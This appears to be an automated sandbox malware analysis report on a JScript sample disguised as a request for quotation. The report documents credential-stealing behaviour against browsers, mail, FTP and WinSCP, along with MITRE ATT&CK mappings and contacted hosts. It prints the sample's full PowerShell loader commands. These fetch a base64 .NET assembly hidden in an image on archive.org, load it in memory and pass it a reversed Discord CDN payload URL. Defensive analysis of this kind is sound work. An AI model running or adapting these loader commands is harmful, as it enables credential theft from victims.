gu? ? ? ? v? ? ? ? bl? ? ? ? hg? ? ? ? d? ? ? ? ? ? ? ? g? ? ? ? d0? ? ? ? i? ? ? ? bb? ? ? ? fm? ? ? ? eqbz? ? ? ? hq? ? ? ? zqbt? ? ? ? c4? ? ? ? v? ? ? ? bl? ? ? ? hg? ? ? ? d? ? ? ? ? ? ? ? u? ? ? ? eu? ? ? ? bgbj? ? ? ? g8? ? ? ? z? ? ? ? bp? ? ? ? g4? ? ? ? zwbd? ? ? ? do? ? ? ? ogbv? ? ? ? fq? ? ? ? rg? ? ? ? 4? ? ? ? c4? ? ? ? rwbl? ? ? ? hq? ? ? ? uwb0? ? ? ? hi? ? ? ? aqbu? ? ? ? gc? ? ? ? k? ? ? ? ? ? ? ? k? ? ? ? gk? ? ? ? bqbh? ? ? ? gc? ? ? ? zqbc? ? ? ? hk? ? ? ? d? ? ? ? bl? ? ? ? hm? ? ? ? kq? ? ? ? 7? ? ? ? cq? ? ? ? cwb0? ? ? ? ge? ? ? ? cgb0? ? ? ? ey? ? ? ? b? ? ? ? bh? ? ? ? gc? ? ? ? i? ? ? ? ? ? ? ? 9? ? ? ? c? ? ? ? ? ? ? ? jw? ? ? ? 8? ? ? ? dw? ? ? ? qgbb? ? ? ? fm? ? ? ? rq? ? ? ? 2? ? ? ? dq? ? ? ? xwbt? ? ? ? fq? ? ? ? qqbs? ? ? ? fq? ? ? ? pg? ? ? ? +? ? ? ? cc? ? ? ? ow? ? ? ? k? ? ? ? gu? ? ? ? bgbk? ? ? ? ey? ? ? ? b? ? ? ? bh? ? ? ? gc? ? ? ? i? ? ? ? ? ? ? ? 9? ? ? ? c? ? ? ? ? ? ? ? jw? ? ? ? 8? ? ? ? dw? ? ? ? qgbb?
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "$imageurl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webclient = new-object system.net.webclient;$imagebytes = $webclient.downloaddata($imageurl);$imagetext = [system.text.encoding]::utf8.getstring($imagebytes);$startflag = '<<base64_start>>';$endflag = '<<base64_end>>';$startindex = $imagetext.indexof($startflag);$endindex = $imagetext.indexof($endflag);$startindex -ge 0 -and $endindex -gt $startindex;$startindex += $startflag.length;$base64length = $endindex - $startindex;$base64command = $imagetext.substring($startindex, $base64length);$commandbytes = [system.convert]::frombase64string($base64command);$loadedassembly = [system.reflection.assembly]::load($commandbytes);$type = $loadedassembly.gettype('dnlib.io.home');$method = $type.getmethod('vai').invoke($null, [object[]] ('&f815e5fb749106f21729c58ee9d5d4362f113d9dbc69e72e0b64b3c04c574c1d=mh&03aacc66=si&0bbfdc66=xe?txt.giro/9282559141872667721/9547513900813347721/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , '1' , 'c:\programdata\' , 'padral','installutil','desativado'))"
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'j? ? ? ? bp? ? ? ? g0? ? ? ? yqbn? ? ? ? gu? ? ? ? vqby? ? ? ? gw? ? ? ? i? ? ? ? ? ? ? ? 9? ? ? ? c? ? ? ? ? ? ? ? jwbo? ? ? ? hq? ? ? ? d? ? ? ? bw? ? ? ? hm? ? ? ? og? ? ? ? v? ? ? ? c8? ? ? ? aqbh? ? ? ? dy? ? ? ? m? ? ? ? ? ? ? ? x? ? ? ? dy? ? ? ? m? ? ? ? ? ? ? ? 2? ? ? ? c4? ? ? ? dqbz? ? ? ? c4? ? ? ? yqby? ? ? ? gm? ? ? ? a? ? ? ? bp? ? ? ? hy? ? ? ? zq? ? ? ? u? ? ? ? g8? ? ? ? cgbn? ? ? ? c8? ? ? ? mq? ? ? ? w? ? ? ? c8? ? ? ? aqb0? ? ? ? gu? ? ? ? bqbz? ? ? ? c8? ? ? ? z? ? ? ? bl? ? ? ? ge? ? ? ? d? ? ? ? bo? ? ? ? g4? ? ? ? bwb0? ? ? ? gu? ? ? ? xw? ? ? ? y? ? ? ? d? ? ? ? ? ? ? ? mg? ? ? ? 0? ? ? ? d? ? ? ? ? ? ? ? nw? ? ? ? v? ? ? ? gq? ? ? ? zqbh? ? ? ? hq? ? ? ? a? ? ? ? bu? ? ? ? g8? ? ? ? d? ? ? ? bl? ? ? ? c4? ? ? ? agbw? ? ? ? gc? ? ? ? jw? ? ? ? 7? ? ? ? cq? ? ? ? dwbl? ? ? ? gi? ? ? ? qwbs? ? ? ? gk? ? ? ? zqbu? ? ? ? hq? ? ? ? i? ? ? ? ? ? ? ? 9? ? ? ? c? ? ? ? ? ? ? ? tgbl? ? ? ? hc? ? ? ? lqbp? ? ? ? gi? ? ? ? agbl? ? ? ? gm? ? ? ? d? ? ? ? ? ? ? ? g? ? ? ? fm? ? ? ? eqbz? ? ? ? hq? ? ? ? zqbt? ? ? ? c4? ? ? ? tgbl? ? ? ? hq? ? ? ? lgbx? ? ? ? gu? ? ? ? ygbd? ? ? ? gw? ? ? ? aqbl? ? ? ? g4? ? ? ? d? ? ? ? ? ? ? ? 7? ? ? ? cq? ? ? ? aqbt? ? ? ? ge? ? ? ? zwbl? ? ? ? ei? ? ? ? eqb0? ? ? ? gu? ? ? ? cw? ? ? ? g? ? ? ? d0? ? ? ? i? ? ? ? ? ? ? ? k? ? ? ? hc? ? ? ? zqbi? ? ? ? em? ? ? ? b? ? ? ? bp? ? ? ? gu? ? ? ? bgb0? ? ? ? c4? ? ? ? r? ? ? ? bv? ? ? ? hc? ? ? ? bgbs? ? ? ? g8? ? ? ? yqbk? ? ? ? eq? ? ? ? yqb0? ? ? ? ge? ? ? ? k? ? ? ? ? ? ? ? k? ? ? ? gk? ? ? ? bqbh? ? ? ? gc? ? ? ? zqbv? ? ? ? hi? ? ? ? b? ? ? ? ? ? ? ? p? ? ? ? ds? ? ? ? j? ? ? ? bp? ? ? ? g0? ? ? ? yqbn? ? ? ? gu? ? ? ? v? ? ? ? bl? ? ? ? hg? ? ? ? d? ? ? ? ? ? ? ? g? ? ? ? d0? ? ? ? i? ? ? ? bb? ? ? ? fm? ? ? ? eqbz? ? ? ? hq? ? ? ? zqbt? ? ? ? c4? ? ? ? v? ? ? ? bl? ? ? ? hg? ? ? ? d? ? ? ? ? ? ? ? u? ? ? ? eu? ? ? ? bgbj? ? ? ? g8? ? ? ? z? ? ? ? bp? ? ? ? g4? ? ? ? zwbd? ? ? ? do? ? ? ? ogbv? ? ? ? fq? ? ? ? rg? ? ? ? 4? ? ? ? c4? ? ? ? rwbl? ? ? ? hq? ? ? ? uwb0? ? ? ? hi? ? ? ? aqbu? ? ? ? gc? ? ? ? k? ? ? ? ? ? ? ? k? ? ? ? gk? ? ? ? bqbh? ? ? ? gc? ? ? ? zqbc? ? ? ? hk? ? ? ? d? ? ? ? bl? ? ? ? hm? ? ? ? kq? ? ? ? 7? ? ? ? cq? ? ? ? cwb0? ? ? ? ge? ? ? ? cgb0? ? ? ? ey? ? ? ? b? ? ? ? bh? ? ? ? gc? ? ? ? i? ? ? ? ? ? ? ? 9? ? ? ? c? ? ? ? ? ? ? ? jw? ? ? ? 8? ? ? ? dw? ? ? ? qgbb? ? ? ? fm? ? ? ? rq? ? ? ? 2? ? ? ? dq? ? ? ? xwbt? ? ? ? fq? ? ? ? qqbs? ? ? ? fq? ? ? ? pg? ? ? ? +? ? ? ? cc? ? ? ? ow? ? ? ? k? ? ? ? gu? ? ? ? bgbk? ? ? ? ey? ? ? ? b? ? ? ? bh? ? ? ? gc? ? ? ? i? ? ? ? ? ? ? ? 9? ? ? ? c? ? ? ? ? ? ? ? jw? ? ? ? 8? ? ? ? dw? ? ? ? qgbb? Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "$imageurl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webclient = new-object system.net.webclient;$imagebytes = $webclient.downloaddata($imageurl);$imagetext = [system.text.encoding]::utf8.getstring($imagebytes);$startflag = '<<base64_start>>';$endflag = '<<base64_end>>';$startindex = $imagetext.indexof($startflag);$endindex = $imagetext.indexof($endflag);$startindex -ge 0 -and $endindex -gt $startindex;$startindex += $startflag.length;$base64length = $endindex - $startindex;$base64command = $imagetext.substring($startindex, $base64length);$commandbytes = [system.convert]::frombase64string($base64command);$loadedassembly = [system.reflection.assembly]::load($commandbytes);$type = $loadedassembly.gettype('dnlib.io.home');$method = $type.getmethod('vai').invoke($null, [object[]] ('&f815e5fb749106f21729c58ee9d5d4362f113d9dbc69e72e0b64b3c04c574c1d=mh&03aacc66=si&0bbfdc66=xe?txt.giro/9282559141872667721/9547513900813347721/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , '1' , 'c:\programdata\' , 'padral','installutil','desativado'))"Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 4.2.powershell.exe.1ce9038cb90.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.powershell.exe.1ce9038cb90.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000008.00000002.3317780029.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.3317780029.0000000002A3E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.3317780029.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2121822566.000001CE9033B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.3314034546.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1964, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 1632, type: MEMORYSTR
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: Yara matchFile source: 4.2.powershell.exe.1ce9038cb90.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.powershell.exe.1ce9038cb90.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000008.00000002.3317780029.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2121822566.000001CE9033B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.3314034546.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1964, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 1632, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: 4.2.powershell.exe.1ce9038cb90.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.powershell.exe.1ce9038cb90.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000008.00000002.3317780029.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.3317780029.0000000002A3E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.3317780029.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2121822566.000001CE9033B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.3314034546.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1964, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 1632, type: MEMORYSTR
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity Information22
                      Scripting
                      Valid Accounts231
                      Windows Management Instrumentation
                      22
                      Scripting
                      1
                      DLL Side-Loading
                      1
                      Disable or Modify Tools
                      2
                      OS Credential Dumping
                      1
                      File and Directory Discovery
                      Remote Services11
                      Archive Collected Data
                      1
                      Ingress Tool Transfer
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      Exploitation for Client Execution
                      1
                      DLL Side-Loading
                      211
                      Process Injection
                      1
                      Deobfuscate/Decode Files or Information
                      1
                      Input Capture
                      34
                      System Information Discovery
                      Remote Desktop Protocol2
                      Data from Local System
                      11
                      Encrypted Channel
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain Accounts11
                      Command and Scripting Interpreter
                      11
                      Registry Run Keys / Startup Folder
                      11
                      Registry Run Keys / Startup Folder
                      2
                      Obfuscated Files or Information
                      1
                      Credentials in Registry
                      531
                      Security Software Discovery
                      SMB/Windows Admin Shares1
                      Email Collection
                      1
                      Non-Standard Port
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal Accounts3
                      PowerShell
                      Login HookLogin Hook1
                      Software Packing
                      NTDS1
                      Process Discovery
                      Distributed Component Object Model1
                      Input Capture
                      2
                      Non-Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      DLL Side-Loading
                      LSA Secrets261
                      Virtualization/Sandbox Evasion
                      SSHKeylogging13
                      Application Layer Protocol
                      Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts261
                      Virtualization/Sandbox Evasion
                      Cached Domain Credentials1
                      Application Window Discovery
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items211
                      Process Injection
                      DCSync1
                      System Network Configuration Discovery
                      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1499556 Sample: RFQ448903423_MAT_HASUE_de_M... Startdate: 27/08/2024 Architecture: WINDOWS Score: 100 36 smtp.zoho.eu 2->36 38 ip-api.com 2->38 40 2 other IPs or domains 2->40 54 Suricata IDS alerts for network traffic 2->54 56 Found malware configuration 2->56 58 Malicious sample detected (through community Yara rule) 2->58 60 14 other signatures 2->60 10 wscript.exe 1 1 2->10         started        signatures3 process4 signatures5 76 JScript performs obfuscated calls to suspicious functions 10->76 78 Suspicious powershell command line found 10->78 80 Wscript starts Powershell (via cmd or directly) 10->80 82 4 other signatures 10->82 13 powershell.exe 7 10->13         started        process6 signatures7 84 Suspicious powershell command line found 13->84 86 Found suspicious powershell code related to unpacking or dynamic code loading 13->86 16 powershell.exe 15 16 13->16         started        20 conhost.exe 13->20         started        process8 dnsIp9 32 ia601606.us.archive.org 207.241.227.86, 443, 49704 INTERNET-ARCHIVEUS United States 16->32 34 cdn.discordapp.com 162.159.135.233, 443, 49705 CLOUDFLARENETUS United States 16->34 46 Creates autostart registry keys with suspicious values (likely registry only malware) 16->46 48 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 16->48 50 Writes to foreign memory regions 16->50 52 Injects a PE file into a foreign processes 16->52 22 InstallUtil.exe 15 2 16->22         started        26 InstallUtil.exe 16->26         started        28 cmd.exe 1 16->28         started        signatures10 process11 dnsIp12 42 ip-api.com 208.95.112.1, 49706, 80 TUT-ASUS United States 22->42 44 smtp.zoho.eu 185.230.212.164, 49707, 49708, 587 COMPUTERLINEComputerlineSchlierbachSwitzerlandCH Netherlands 22->44 62 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 22->62 64 Tries to steal Mail credentials (via file / registry access) 22->64 66 Tries to harvest and steal ftp login credentials 22->66 68 Tries to harvest and steal browser information (history, passwords, etc) 22->68 70 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 26->70 72 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 26->72 74 Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent) 26->74 30 conhost.exe 28->30         started        signatures13 process14

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      RFQ448903423_MAT_HASUE_de_Mexico.js11%ReversingLabs
                      RFQ448903423_MAT_HASUE_de_Mexico.js14%VirustotalBrowse
                      No Antivirus matches
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      smtp.zoho.eu0%VirustotalBrowse
                      ia601606.us.archive.org0%VirustotalBrowse
                      cdn.discordapp.com1%VirustotalBrowse
                      ip-api.com0%VirustotalBrowse
                      SourceDetectionScannerLabelLink
                      http://nuget.org/NuGet.exe0%URL Reputationsafe
                      https://account.dyn.com/0%URL Reputationsafe
                      http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                      https://go.micro0%URL Reputationsafe
                      https://contoso.com/License0%URL Reputationsafe
                      https://contoso.com/Icon0%URL Reputationsafe
                      https://aka.ms/pscore60%URL Reputationsafe
                      https://contoso.com/0%URL Reputationsafe
                      https://nuget.org/nuget.exe0%URL Reputationsafe
                      http://ip-api.com0%URL Reputationsafe
                      https://oneget.orgX0%URL Reputationsafe
                      https://aka.ms/pscore680%URL Reputationsafe
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                      http://crl.v0%URL Reputationsafe
                      https://oneget.org0%URL Reputationsafe
                      http://ip-api.com/line/?fields=hosting0%URL Reputationsafe
                      https://ia601606.us.arXR(0%Avira URL Cloudsafe
                      http://www.apache.org/licenses/LICENSE-2.00%Avira URL Cloudsafe
                      https://cdn.discordapp.com/attachments/1277433180093157459/1277662781419552829/ORIG.txt?ex=66cdfbb0&0%Avira URL Cloudsafe
                      http://www.apache.org/licenses/LICENSE-2.0.html0%Avira URL Cloudsafe
                      http://cdp.thawte.com/ThawteTLSRSACAG1.crl0p0%Avira URL Cloudsafe
                      https://cdn.discordapp.com0%Avira URL Cloudsafe
                      http://www.apache.org/licenses/LICENSE-2.0.html00%Avira URL Cloudsafe
                      https://ia601606.us.archive.org/10/items/deathnote0%Avira URL Cloudsafe
                      http://cdp.thawte.com/ThawteTLSRSACAG1.crl0p0%VirustotalBrowse
                      http://www.apache.org/licenses/LICENSE-2.0.html0%VirustotalBrowse
                      https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg100%Avira URL Cloudmalware
                      http://www.apache.org/licenses/LICENSE-2.0.html00%VirustotalBrowse
                      http://cacerts.thawte.com/ThawteTLSRSACAG1.crt00%Avira URL Cloudsafe
                      https://github.com/Pester/Pester0%Avira URL Cloudsafe
                      http://smtp.zoho.eu0%Avira URL Cloudsafe
                      https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg4%VirustotalBrowse
                      https://cdn.discordapp.com/attachments/1277433180093157459/1277662781419552829/ORIG.txt?ex=66cdfbb0&is=66ccaa30&hm=d1c475c40c3b46b0e27e96cbd9d311f2634d5d9ee85c92712f601947bf5e518f&0%Avira URL Cloudsafe
                      http://www.apache.org/licenses/LICENSE-2.00%VirustotalBrowse
                      https://cdn.discordapp.com1%VirustotalBrowse
                      https://ia601606.us.archive.org/10/items/deathnote0%VirustotalBrowse
                      http://status.thawte.com0:0%Avira URL Cloudsafe
                      http://smtp.zoho.eu0%VirustotalBrowse
                      http://cdn.discordapp.com0%Avira URL Cloudsafe
                      http://ia601606.us.archive.org0%Avira URL Cloudsafe
                      https://ia601606.us.archive.org0%Avira URL Cloudsafe
                      https://github.com/Pester/Pester1%VirustotalBrowse
                      http://cdn.discordapp.com1%VirustotalBrowse
                      https://ia601606.us.archive.org0%VirustotalBrowse
                      http://ia601606.us.archive.org0%VirustotalBrowse
                      http://cacerts.thawte.com/ThawteTLSRSACAG1.crt00%VirustotalBrowse
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      smtp.zoho.eu
                      185.230.212.164
                      truetrueunknown
                      ia601606.us.archive.org
                      207.241.227.86
                      truetrueunknown
                      cdn.discordapp.com
                      162.159.135.233
                      truetrueunknown
                      ip-api.com
                      208.95.112.1
                      truetrueunknown
                      NameMaliciousAntivirus DetectionReputation
                      https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpgtrue
                      • 4%, Virustotal, Browse
                      • Avira URL Cloud: malware
                      unknown
                      https://cdn.discordapp.com/attachments/1277433180093157459/1277662781419552829/ORIG.txt?ex=66cdfbb0&is=66ccaa30&hm=d1c475c40c3b46b0e27e96cbd9d311f2634d5d9ee85c92712f601947bf5e518f&true
                      • Avira URL Cloud: safe
                      unknown
                      http://ip-api.com/line/?fields=hostingfalse
                      • URL Reputation: safe
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      http://nuget.org/NuGet.exepowershell.exe, 00000004.00000002.2105359169.000001CE819FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
